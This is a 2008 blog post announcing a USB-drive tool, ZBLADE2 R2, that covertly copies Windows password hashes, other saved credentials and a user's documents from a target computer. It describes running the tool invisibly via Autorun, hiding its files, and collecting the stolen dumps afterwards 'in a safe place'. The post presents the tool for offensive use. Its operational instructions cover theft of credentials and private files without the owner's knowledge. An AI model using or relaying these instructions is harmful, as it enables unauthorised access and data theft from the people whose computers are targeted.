Found something useful? Don't forget to leave a comment!

Friday, March 14, 2008

ZBLADE2 R2 is released!

I have released ZBLADE2 R2, the second revision of my USB Switchblade-inspired information and file dumping tool. This new release weighs in at only 690MB uncompressed, a big improvement over the 1.5MB of the first ZBLADE2 release.

Toolkit changes:
  • ROBOCOPY (from the Win2003 SRK) is now used to perform 1:1 uncompressed file dumps. ZIP compression was dropped to maximize performance.
  • gsecdump replaces fgdump for Windows password hashes. This means that domain logon dump (cachedump) capability is no longer present, but since mscash hashes are a bitch to crack anyway, I see no present need for fgdump, which is a much larger program anyway.
  • Various updates to the Nirsoft tools
  • Intelligent detection of user's admin credentials - if the user's rights are insufficient, ZBLADE2 will skip tools that require admin access
  • Intelligent detection of user's document root for file dumping - local My Documents folders or a domain-based network drive
  • packaged as a WinRAR SFX installer - yay, noob friendly!
  • Download (see below)
  • Run the installer and select your USB drive. It must be installed to the root of the drive (selecting a subfolder will NOT work).
  • Stick the ZBLADE2-equipped drive in a target Windows 2000/XP/Vista computer. Admin privileges are required if you want to run gsecdump. Otherwise, all other components (including the file dumper!) should work regardless of account privileges.
  • Many computers have Autorun enabled, so a window should pop up - select "Open this device". (this recommended method is completely invisible)
  • If Autorun is not enabled and a window does not pop up, go to the USB drive from My Computer and start kickstart.cmd (a command prompt will flash for maybe a split second, but everything afterward will be completely invisible).
  • All of ZBLADE2's files (with the exception of kickstart.cmd) are hidden, unless Windows Explorer is set to show hidden files.
  • ZBLADE2's information and file dumping is limited by the capacity of your USB device.
  • The running time is largely determined by how many files are to be dumped, as well as the write speed of your USB device. This can be anywhere from a few seconds to several minutes.
Accessing Dumps after a Successful Run
  • Go to a safe place.
  • Make sure Windows Explorer can see hidden files. Go to the ZBLADE2\dumps folder. Click the dump folder that corresponds to the name of the targeted computer.
  • There will be several text files containing information from the various dumping programs. See info.txt for some general information about the dump.
  • The files folder contains the target user's dumped files. Inside is a 1:1 replication of the user's folder structure.
  • By default, only these file types are copied (see Customization below to modify): *.doc *.docx *.xls *.xlsx *.txt *.rtf *.pdf
  • See ZBLADE2\prgm\run.cmd. This is the main batch script. At the top you may customize the file types to dump (use * for all files if you have a fast and fat drive).
  • More 1337 people might want to take a look at the remaining code and modify to suit their needs.

Enough chitchat, go grab your copy of ZBLADE2 R2 while it's hot!

MD5: 777231CA2B5C1636EFD6660A68A45559

No comments: